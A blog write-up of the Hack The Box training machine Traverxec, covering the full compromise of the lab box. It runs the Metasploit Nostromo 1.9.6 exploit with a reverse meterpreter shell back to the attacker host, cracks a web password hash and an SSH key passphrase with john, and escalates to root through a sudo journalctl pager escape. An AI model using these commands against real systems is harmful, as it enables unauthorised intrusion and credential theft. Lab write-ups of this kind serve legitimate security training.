Home Hack The Box Write-Up Traverxec - 10.10.10.165
Post
Cancel

Hack The Box Write-Up Traverxec - 10.10.10.165

Everything is a copy of a copy of a copy.

Chuck Palahniuk, Fight Club

About Traverxec

In this post, I’m writing a write-up for the machine Traverxec from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Traverxec is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold

After the port scan, I checked the HTTP service first and found that this website is running on Nostromo 1.9.6. There is a known Remote Code Execution vulnerability for this specific version of Nostromo. With the use of Metasploit I was able to get an shell as the user www-data to this box.

User

For getting the user flag, there was some enumeration needed. On the box, there is a protected-file-area that contains a backup of SSH keys. After cracking the private key I was able to get a shell through SSH to this box with the user David. After the SSH connection was established I could grab the user flag.

Root

After getting an SSH session with the user David I found a directory called bin in his home folder which contains a bash script. This bash script calls journalctl as root. By using an interactive system shell I was able to break out from the restricted environment and do a privilege escalation to root.

Machine Info

hackthebox-tracerxec-machineinfo

hackthebox-tracerxec-machine-ip-and-creator

Recon

Port scan with Nmap

I start this box with an port scan with Nmap.

1
~$ nmap -sC -sV -oA ./nmap/traverxec.txt 10.10.10.165

Results of the portscan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 19:45 CET
Nmap scan report for 10.10.10.165
Host is up (0.11s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.81 seconds

I have got two open ports:

  • 22/tcp (SSH)
  • 80/tcp (HTTP, nostromo 1.9.6)

Enumeration

Enumeration Web Server

As the HTTP port is open, there is a change that there is a website hosted on this box. I visited this URL http://10.10.10.165 and checked this website. I have checked the URLs on this website, but none of them is pointing to a webpage. This website only shows David White. It seems that he is created for the web. Well, me too. I feel a connection with him…

The webpage at http://10.10.10.165

According to the results of the Nmap scan, this website is running on a nostromo 1.9.6 Web Server. Let’s check if there is a known vulnerability for this version of Nostromo. This is the point where searchsploit comes in.

1
2
3
4
5
6
7
8
9
10
~$ searchsploit nostromo
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                                  | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                                                                | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                                  | exploits/linux/remote/35466.sh
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

And there is a known vulnerability for this specific Nostromo version. Let’s start Metasploit and check if I can get a shell on this box.

Exploitation

Nostromo 1.9.6 – Remote Code Execution

I opened Metasploit with msfconsole and configured the exploit as below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set rhosts 10.10.10.165
rhosts => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 10.10.10.165:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set lhost 10.10.15.221
lhost => 10.10.15.221
msf5 exploit(multi/http/nostromo_code_exec) > set lport 4444
lport => 4444
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 10.10.15.221:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 10.10.10.165
[*] Meterpreter session 1 opened (10.10.15.221:4444 -> 10.10.10.165:38632) at 2020-02-03 23:21:13 +0100

Ok, got now a shell on this box. Got a shell as user www-data.

1
2
meterpreter > pwd
/usr/bin

Upgraded the shell with the command shell. Let’s poke some around.

1
2
3
4
5
6
7
cd /home
$ ls -al
ls -al
total 12
drwxr-xr-x  3 root  root  4096 Oct 25 14:32 .
drwxr-xr-x 18 root  root  4096 Oct 25 14:17 ..
drwx--x--x  5 david david 4096 Oct 25 17:02 david

There is a user david listed. I need to find the credentials of this user account.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ ls  
bin   home            lib32       media  root  sys  vmlinuz
boot  initrd.img      lib64       mnt    run   tmp  vmlinuz.old
dev   initrd.img.old  libx32      opt    sbin  usr
etc   lib             lost+found  proc   srv   var
$ cd /var
/var$ ls
backups  cache  lib  local  lock  log  mail  nostromo  opt  run  spool  tmp
$ cd nostromo
/var/nostromo$ ls 
conf  htdocs  icons  logs
/var/nostromo/conf$ cd conf
/var/nostromo/conf$ ls -al
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27 16:12 .
drwxr-xr-x 6 root root   4096 Oct 25 14:43 ..
-rw-r--r-- 1 root bin      41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin    2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin     498 Oct 25 15:20 nhttpd.conf
/var/nostromo/conf$ cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

I have now the hashed password for the user david. I placed this hash in a file named password-david.txt.

Getting User

Crack password david

The next step is to crack this password. I’m sure john can handle this. But, before that, I need to identify the hash type before I know what to do with john.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~# hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------
 HASH: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Possible Hashs:
[+] MD5(Unix)
--------------------------------------------------

It’s an MD5(Unix) hash. I used john with the well-known wordlist rockyou.txt for cracking this password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
~$ john password-david.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:27 0.13% (ETA: 03:37:47) 0g/s 38595p/s 38595c/s 38595C/s PITOTE..PILLO
0g 0:00:02:06 0.56% (ETA: 04:00:35) 0g/s 35851p/s 35851c/s 35851C/s poohpie3..poohneeyore5
0g 0:00:03:35 0.91% (ETA: 04:18:29) 0g/s 34100p/s 34100c/s 34100C/s idciilj1..idaxina
0g 0:00:04:21 1.13% (ETA: 04:11:52) 0g/s 34643p/s 34643c/s 34643C/s cgpui1719..cgodfrey
0g 0:00:05:23 1.27% (ETA: 04:49:20) 0g/s 31567p/s 31567c/s 31567C/s acdmis..acdcroker@
0g 0:00:05:25 1.27% (ETA: 04:51:00) 0g/s 31443p/s 31443c/s 31443C/s abby213..abby123arjay
Nowonly4me       (?)
1g 0:00:05:45 DONE (2020-02-03 21:51) 0.002897g/s 30645p/s 30645c/s 30645C/s Noyoudo..November^
Use the "--show" option to display all of the cracked passwords reliably
Session completed
~$ john --show password-david.txt 
?:Nowonly4me

1 password hash cracked, 0 left
t13nn3s@kali:/home/htb/boxes/machines/traverxec$ 

Ok, now I got the password: Nowonly4me. I tried to create an SSH connection with the user David in combination with this password, but it’s not working. There has something more to be done.

Access the Protected File Area

After some time poking around on this box, I ended up reading the Nostromos’ manual. There has something more on this box. After some Googling around on the internet, I headed back to the /var/nostromo/conf directory and read the nhttpd.conf. The last two lines contain useful information.

1
2
3
4
5
6
7
meterpreter > cd /var/nostromo/conf
meterpreter > cat nhttpd.conf
...
# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

The homedirs section /home is placed before the user (ex /home/user). But the public_www is placed after the user. (ex. /home/user/public_www). I do not have access to the home folder of the user account david. But, maybe I do have access to the location /home/david/public_www.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
meterpreter > cd /home/david/public_www
meterpreter > ls
Listing: /home/david/public_www
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  402   fil   2019-10-25 21:45:10 +0200  index.html
40755/rwxr-xr-x   4096  dir   2019-10-25 23:02:59 +0200  protected-file-area

Wiewjie! Got access, I like this box already! There are some files listed. I downloaded the ‘file backup-ssh-identity-files.tgz’ to my local machine for further investigation.

meterpreter > cd protected-file-area
meterpreter > ls
Listing: /home/david/public_www/protected-file-area
===================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  45    fil   2019-10-25 21:46:01 +0200  .htaccess
100644/rw-r--r--  1915  fil   2019-10-25 23:02:59 +0200  backup-ssh-identity-files.tgz

meterpreter > cat .htaccess 
realm David's Protected File Area. Keep out!
meterpreter > download backup-ssh-identity-files.tgz
[*] Downloading: backup-ssh-identity-files.tgz -> backup-ssh-identity-files.tgz
[*] Downloaded 1.87 KiB of 1.87 KiB (100.0%): backup-ssh-identity-files.tgz -> backup-ssh-identity-files.tgz
[*] download   : backup-ssh-identity-files.tgz -> backup-ssh-identity-files.tgz
meterpreter > 

Back on my machine I extracted the file backup-ssh-identity-files.tgz.

1
2
3
4
5
~$ tar xvzf backup-ssh-identity-files.tgz 
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

This are the files I need for SSH access. I give the hash id_rsa to to ssh2john. The output:

1
id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$b1ec9e1ff7de1b5f5395468c76f1d92bfdaa7f2f29c3076bf6c83be71e213e9249f186ae856a2b08de0b3c957ec1f086b6e8813df672f993e494b90e9de220828aee2e45465b8938eb9d69c1e9199e3b13f0830cde39dd2cd491923c424d7dd62b35bd5453ee8d24199c733d261a3a27c3bc2d3ce5face868cfa45c63a3602bda73f08e87dd41e8cf05e3bb917c0315444952972c02da4701b5da248f4b1725fc22143c7eb4ce38bb81326b92130873f4a563c369222c12f2292fac513f7f57b1c75475b8ed8fc454582b1172aed0e3fcac5b5850b43eee4ee77dbedf1c880a27fe906197baf6bd005c43adbf8e3321c63538c1abc90a79095ced7021cbc92ffd1ac441d1dd13b65a98d8b5e4fb59ee60fcb26498729e013b6cff63b29fa179c75346a56a4e73fbcc8f06c8a4d5f8a3600349bb51640d4be260aaf490f580e3648c05940f23c493fd1ecb965974f464dea999865cfeb36408497697fa096da241de33ffd465b3a3fab925703a8e3cab77dc590cde5b5f613683375c08f779a8ec70ce76ba8ecda431d0b121135512b9ef486048052d2cfce9d7a479c94e332b92a82b3d609e2c07f4c443d3824b6a8b543620c26a856f4b914b38f2cfb3ef6780865f276847e09fe7db426e4c319ff1e810aec52356005aa7ba3e1100b8dd9fa8b6ee07ac464c719d2319e439905ccaeb201bae2c9ea01e08ebb9a0a9761e47b841c47d416a9db2686c903735ebf9e137f3780b51f2b5491e50aea398e6bba862b6a1ac8f21c527f852158b5b3b90a6651d21316975cd543709b3618de2301406f3812cf325d2986c60fdb727cadf3dd17245618150e010c1510791ea0bec870f245bf94e646b72dc9604f5acefb6b28b838ba7d7caf0015fe7b8138970259a01b4793f36a32f0d379bf6d74d3a455b4dd15cda45adcfdf1517dca837cdaef08024fca3a7a7b9731e7474eddbdd0fad51cc7926dfbaef4d8ad47b1687278e7c7474f7eab7d4c5a7def35bfa97a44cf2cf4206b129f8b28003626b2b93f6d01aea16e3df597bc5b5138b61ea46f5e1cd15e378b8cb2e4ffe7995b7e7e52e35fd4ac6c34b716089d599e2d1d1124edfb6f7fe169222bc9c6a4f0b6731523d436ec2a15c6f147c40916aa8bc6168ccedb9ae263aaac078614f3fc0d2818dd30a5a113341e2fcccc73d421cb711d5d916d83bfe930c77f3f99dba9ed5cfcee020454ffc1b3830e7a1321c369380db6a61a757aee609d62343c80ac402ef8abd56616256238522c57e8db245d3ae1819bd01724f35e6b1c340d7f14c066c0432534938f5e3c115e120421f4d11c61e802a0796e6aaa5a7f1631d9ce4ca58d67460f3e5c1cdb2c5f6970cc598805abb386d652a0287577c453a159bfb76c6ad4daf65c07d386a3ff9ab111b26ec2e02e5b92e184e44066f6c7b88c42ce77aaa918d2e2d3519b4905f6e2395a47cad5e2cc3b7817b557df3babc30f799c4cd2f5a50b9f48fd06aaf435762062c4f331f989228a6460814c1c1a777795104143630dc16b79f51ae2dd9e008b4a5f6f52bb4ef38c8f5690e1b426557f2e068a9b3ef5b4fe842391b0af7d1e17bfa43e71b6bf16718d67184747c8dc1fcd1568d4b8ebdb6d55e62788553f4c69d128360b407db1d278b5b417f4c0a38b11163409b18372abb34685a30264cdfcf57655b10a283ff0

Now I have got the hash is the time (again) for john.

1
2
3
4
5
6
7
8
9
10
11
12
~$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (?)
1g 0:00:00:11 DONE (2020-02-03 23:30) 0.08532g/s 1223Kp/s 1223Kc/s 1223KC/sa6_123..*7¡Vamos!
Session completed

I now have the SSH key and the password. With these data, I can create an SSH session as user david and get the user.txt.

1
2
3
4
5
6
7
8
9
~$ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Mon Feb  3 17:35:36 2020 from 10.10.15.207
david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
david@traverxec:~$ 

Submit the flag, and go to the next phase.

Privilege escalation

Enumeration

I need to perform now some enumeration to get root access. I have access to SSH with the user david, from this point I’m starting the enumeration to get root access.

There are two folders in this location. I do not have access to run the sudo -l command to check my current level of privileges.

1
2
david@traverxec:~$ ls
bin  public_www  user.txt

Let’s start with the bin folder. Those files are listed in this folder.

1
2
3
4
5
6
david@traverxec:~/bin$ ls -al
total 32
drwx------ 2 david david  4096 Feb  4 15:59  .
drwx--x--x 5 david david  4096 Feb  4 15:53  ..
-r-------- 1 david david   802 Oct 25 16:26  server-stats.head
-rwx------ 1 david david   363 Oct 25 16:26  server-stats.sh

I first file shows an picture.

1
2
3
4
5
6
7
8
9
10
11
david@traverxec:~/bin$ cat server-stats.head 
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

Own Traverxec

The second file shows an bash script.

1
david@traverxec:~/bin$ cat server-stats.sh

The contents of the script:

1
2
3
4
5
6
7
8
9
10
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Line 10 is the interesting line. Journalctl will be executed as root. It that case it can be used to outbreak the restricted area. I checked this webpage: https://gtfobins.github.io/gtfobins/journalctl/. I invoked this command:

1
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

After the execution I have to resize the shell to a smaller window, otherwise, the pager will not work. And then executed the command !/bin/sh. Now, I’m root.

Privilege escalation to root

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.